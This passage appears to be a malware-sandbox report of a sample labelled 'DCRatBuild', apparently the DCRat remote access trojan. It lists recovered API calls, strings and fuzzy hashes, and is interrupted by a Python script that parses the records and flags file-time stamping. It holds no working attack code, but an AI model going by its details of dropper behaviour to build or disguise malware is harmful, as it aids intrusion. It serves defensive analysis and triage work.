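• SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00F080B7,?,?,?,?,?,?,?,?), ref: 00F0A416
• CloseHandle.KERNEL32(?,?,00000000,?,00F080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0A41D
Memory Dump Source
• Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
Similarity
• API ID: File$Create$CloseHandleTime
• Instruction Fuzzy Hash: 6E41ED71648384AAE731DF24CC45FEEBBE8AB85724F04091CB5D0D31D1D6A99A88FB13
APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F0ABC5,00000008), ref: 00F106F3
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00F1070D
Strings
• Thread pool initialization failed., xrefs: 00F10725
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• Instruction Fuzzy Hash: C311A0B1900709AFC3215F65CC84AA7FBECEB94765F10482EF1DA82240DAB169C0EB60
APIs
  • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
• EndDialog.USER32(?,00000001), ref: 00F1A9DE
• _swprintf.LIBCMT ref: 00F0B51E
Strings
Similarity
• String ID: GETPASSWORD1
• Instruction Fuzzy Hash: 2B110433941118BADB219A649D49FFA7B6CEF4A721F000026FA45B30D0C2A999D5F6A2
"""


def parse_records(text: str) -> List[Dict]:
    """Split the dump into records; a record ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            done = cur is None or "Instruction Fuzzy Hash" in cur["fields"]
            if line in ("APIs", "Strings") and done:  # a record may open with either header
                cur = {"apis": [], "strings": [], "fields": {}}
                records.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            if m := API_RE.match(line):
                args = [a for a in (m["args"] or "").split(",") if a]
                cur["apis"].append({"api": m["api"], "module": m["mod"], "args": args,
                                    "ref": m["ref"], "subcall": m["sub"]})
        elif section == "Strings":
            if m := XREF_RE.match(line):
                cur["strings"].append((m["s"], m["ref"]))
        elif m := FIELD_RE.match(line):
            cur["fields"][m["key"].strip()] = m["val"].strip()
    return records


def writes_then_stamps(rec: Dict) -> bool:
    """True when the function itself (subcalls ignored) opens a file with GENERIC_WRITE
    and later calls SetFileTime: the dropped file's times then come from the sample,
    not from the drop, so they cannot anchor a timeline."""
    opened = False
    for c in rec["apis"]:
        if c["subcall"]:
            continue
        if c["api"] == "CreateFileW" and len(c["args"]) > 1:
            a = c["args"][1]  # '?' means the sandbox could not resolve the value
            opened = opened or (a != "?" and bool(int(a, 16) & GENERIC_WRITE))
        elif c["api"] == "SetFileTime" and opened:
            return True
    return False


def summarize(text: str) -> List[Dict]:
    """One triage row per record: fuzzy hash, direct API sequence, strings, flag."""
    rows = []
    for rec in parse_records(text):
        ids = [v for v in rec["fields"].get("String ID", "").split("$") if v]
        rows.append({"fuzzy": rec["fields"].get("Instruction Fuzzy Hash", ""),
                     "apis": [c["api"] for c in rec["apis"] if not c["subcall"]],
                     "strings": [s for s, _ in rec["strings"]] + ids,
                     "writes_then_stamps": writes_then_stamps(rec)})
    return rows
```

Run `summarize(SAMPLE)` to get one row per record; the Instruction Fuzzy Hash in each row is what you would key on to match the same function across other reports of the same packer, while the `apis` and `strings` lists are what a reviewer reads to decide whether the record matters.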
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00F289AD,?,00000000,?,00000001,?,?,00000001,00F289AD,?), ref: 00F2C0E6
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F2C16F
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F267E2,?), ref: 00F2C181
                                      • __freea.LIBCMT ref: 00F2C18A
                                        • Part of subcall function 00F28518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: 1f45d2e7e01bba06672d23f610bb59c6ccaf908a7add9af38899d8b5c2a55940
                                      • Instruction ID: d3bddd41d94c47e58c992cf9e93992b66ffdb6e2947669e9bed3fe7ba9f706fa
                                      • Opcode Fuzzy Hash: 1f45d2e7e01bba06672d23f610bb59c6ccaf908a7add9af38899d8b5c2a55940
                                      • Instruction Fuzzy Hash: 3C31A072A0012AABDB259F64EC46DAE7BA5EB44720F150229FC04D7151E739CD61EBE0
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00F2251A
                                        • Part of subcall function 00F22B52: ___AdjustPointer.LIBCMT ref: 00F22B9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00F22531
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00F22543
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00F22567
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction ID: 8ba1e353476c74f6d3089134be5f61280ed27dc2a894813c470b25c0312a669f
                                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction Fuzzy Hash: F7012932400119BBCF129F55EC42EDA3BBAEF58714F058114FD1866120C37AE9A1EBA1
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00F19DBE
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F19DCD
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F19DDB
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00F19DE9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 3c8df9687095bf08364eabef3257d156cfd1f71c8b673997e6f31915735962c3
                                      • Instruction ID: 9d3ca9f4a7151ea1476019becf42d683f0758fed02325189b881693b505cae16
                                      • Opcode Fuzzy Hash: 3c8df9687095bf08364eabef3257d156cfd1f71c8b673997e6f31915735962c3
                                      • Instruction Fuzzy Hash: D6E08C31989A25B7C3A01BA0BC0CBCF3B14AB0A7A2F040000FA11A61A0DAB44401FB90
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00F22016
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00F2201B
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00F22020
                                        • Part of subcall function 00F2310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00F2311F
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00F22035
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction ID: 04992cc12e0487526c66e574098e8130ae040f0bf9472c5baeeb0988693aaead
                                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                      • Instruction Fuzzy Hash: 6EC04CA5804670F41CA1BAB13D026BD3B000E62BD4B9225C2E98017143DF0E0B2AB032
                                      APIs
                                        • Part of subcall function 00F19DF1: GetDC.USER32(00000000), ref: 00F19DF5
                                        • Part of subcall function 00F19DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F19E00
                                        • Part of subcall function 00F19DF1: ReleaseDC.USER32(00000000,00000000), ref: 00F19E0B
                                      • GetObjectW.GDI32(?,00000018,?), ref: 00F19F8D
                                        • Part of subcall function 00F1A1E5: GetDC.USER32(00000000), ref: 00F1A1EE
                                        • Part of subcall function 00F1A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00F1A21D
                                        • Part of subcall function 00F1A1E5: ReleaseDC.USER32(00000000,?), ref: 00F1A2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: (
                                      • API String ID: 1061551593-3887548279
                                      • Opcode ID: abfd4066a248cab151de8120a4231fbf61594bff8dfb0e9ae5138442ec48861f
                                      • Instruction ID: 95149e9685bf51f205a7548c2f3675520a943a6741742a43b3d4e841351b806b
                                      • Opcode Fuzzy Hash: abfd4066a248cab151de8120a4231fbf61594bff8dfb0e9ae5138442ec48861f
                                      • Instruction Fuzzy Hash: 52811271608218AFC614DF68CC44A6BBBEAFF88714F00491DF99AD7260CB75ED05EB52
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: eb2ce240fcd28e00679552be88ec3f0b47e6d96237bfef41d5b107986766d176
                                      • Instruction ID: 5c4d75c78510f37140564bdf1d9d34c4a6651bf8ac67d4520bae1dd0a45826f9
                                      • Opcode Fuzzy Hash: eb2ce240fcd28e00679552be88ec3f0b47e6d96237bfef41d5b107986766d176
                                      • Instruction Fuzzy Hash: BD51A033A8C704FAEA211AA5DD13FF67655FB08B00F20891AF79A648E5CED255D0B713
                                      APIs
                                      • _free.LIBCMT ref: 00F2AA84
                                        • Part of subcall function 00F28849: IsProcessorFeaturePresent.KERNEL32(00000017,00F28838,00000050,00F33958,?,00F0CFE0,00000004,00F40EE8,?,?,00F28845,00000000,00000000,00000000,00000000,00000000), ref: 00F2884B
                                        • Part of subcall function 00F28849: GetCurrentProcess.KERNEL32(C0000417,00F33958,00000050,00F40EE8), ref: 00F2886D
                                        • Part of subcall function 00F28849: TerminateProcess.KERNEL32(00000000), ref: 00F28874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                      • Instruction ID: 32df2a52c207637fb72ce0548da65cffce60b872a8b970069777a7bb1d1f0594
                                      • Instruction Fuzzy Hash: 3E51B071E0022AEFDF14DFA8DC81AADB7B5EF48310F258169E854E7300E6399E41DB51
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F07730
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F078CC
                                        • Part of subcall function 00F0A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A458
                                        • Part of subcall function 00F0A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A27A,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A489
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$Attributes$H_prologTime
                                      • String ID: :
                                      • API String ID: 1861295151-336475711
                                      • Opcode ID: 7fa0db764e376c42ad6957ef4ab1a71561a674cbe521323045e630e8034d37a5
                                      • Instruction ID: ae8b9d1e130a216ae835ff5da2ff95817da6c87656ef4d3bd2a83c87a8bfccd2
                                      • Instruction Fuzzy Hash: 56416771D04258AADB24EB50DD55EEEB37CAF45340F0080D9B605A20D2EB786F88FF61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UNC$\\?\
                                      • API String ID: 0-253988292
                                      • Opcode ID: 544700b581ceea7b850a540ad2dab9702230ea5fefc80fe2ee24855e466e97ac
                                      • Instruction ID: 60c960621f94efd1ebb5444f404bcba273d7418e49eb2cd4e1cb65d9c1970dd7
                                      • Instruction Fuzzy Hash: D241C33694021ABACF20AF21DC41EEF77ADAF44760F104465F814A31D2E778DA54FA64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Shell.Explorer$about:blank
                                      • API String ID: 0-874089819
                                      • Opcode ID: 84889088efb820aaf81fefa771b30e1023dd18f8a724952c70d2bb11456bb98e
                                      • Instruction ID: caf860b8061a1eb1fa72cc50bc50204eadc13cfd2f6c1caa1cb2f1ec6046752b
                                      • Instruction Fuzzy Hash: 482187716083149FDB04DF74CC65A667799FF48721B14855DF8098B281DBB5EC41EBA0
                                      APIs
                                        • Part of subcall function 00F0EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0EB92
                                        • Part of subcall function 00F0EB73: GetProcAddress.KERNEL32(00F481C0,CryptUnprotectMemory), ref: 00F0EBA2
                                      • GetCurrentProcessId.KERNEL32(?,?,?,00F0EBEC), ref: 00F0EC84
                                      Strings
                                      • CryptUnprotectMemory failed, xrefs: 00F0EC7C
                                      • CryptProtectMemory failed, xrefs: 00F0EC3B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: 0c1f0902961d6a887b917cecb627080d4e60a6dd5110865bf309db40364f4448
                                      • Instruction ID: 1b54abe15acd670e805b5ebdfeae556b91c262d9251fa0310ac2142d4f337453
                                      • Instruction Fuzzy Hash: C8113632E00228ABFB149B24DD06A6E3B14AF41774B04841AFC05AB2D1CB7A9E41F7D4
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00010000,00F109D0,?,00000000,00000000), ref: 00F108AD
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00F108F4
                                        • Part of subcall function 00F06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06EAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2655393344-3849766595
                                      • Opcode ID: 02af64642aec4f2832e07e8bd034165961413dcab53e13caa4832759d1c63a7c
                                      • Instruction ID: 55ce6381ca1e56f76306f91c78ec7d8c28a09ec38bd72fd24b2b74d41768f46c
                                      • Instruction Fuzzy Hash: 1201D6B52443066FE624AF54EC81BA67798EB40735F20003DFE86A6181CEF1B8C5B664
                                      APIs
                                        • Part of subcall function 00F0DA98: _swprintf.LIBCMT ref: 00F0DABE
                                        • Part of subcall function 00F0DA98: _strlen.LIBCMT ref: 00F0DADF
                                        • Part of subcall function 00F0DA98: SetDlgItemTextW.USER32(?,00F3E154,?), ref: 00F0DB3F
                                        • Part of subcall function 00F0DA98: GetWindowRect.USER32(?,?), ref: 00F0DB79
                                        • Part of subcall function 00F0DA98: GetClientRect.USER32(?,?), ref: 00F0DB85
                                      • GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                      • SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: 0
                                      • API String ID: 2622349952-4108050209
                                      • Opcode ID: b152446f1018310a5d8aa6aeba5325cf9e9255863e4886eca205286f224bc9b6
                                      • Instruction ID: 96714ffa83eb357bc4e6df8d1bfedb9b3614b5be15ea4781073b0879b0f79b41
                                      • Instruction Fuzzy Hash: 7DF03C7050424CA6DF755F608C09BAD3B98BB15355F088414FD49565E2CBB8C999FA50
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00F10A78,?), ref: 00F10854
                                      • GetLastError.KERNEL32(?), ref: 00F10860
                                        • Part of subcall function 00F06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F06EAF
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F10869
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
                                      • Opcode ID: 434fc68384e1a05e0b792e7d631b9b23bcfc6ca0284c245dc735ff4e6d23c3d5
                                      • Instruction ID: 62c50a248f5a88ac5ad4e3d10efab4b30d39b6e11e8f2c8f4c9ad7f7d976d0c3
                                      • Instruction Fuzzy Hash: B7D02E7190812026CA002B24EC0ADAF79068F02330F200324FA38A52F6CE2409A0B2EA
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00F0D32F,?), ref: 00F0DA53
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F0D32F,?), ref: 00F0DA61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
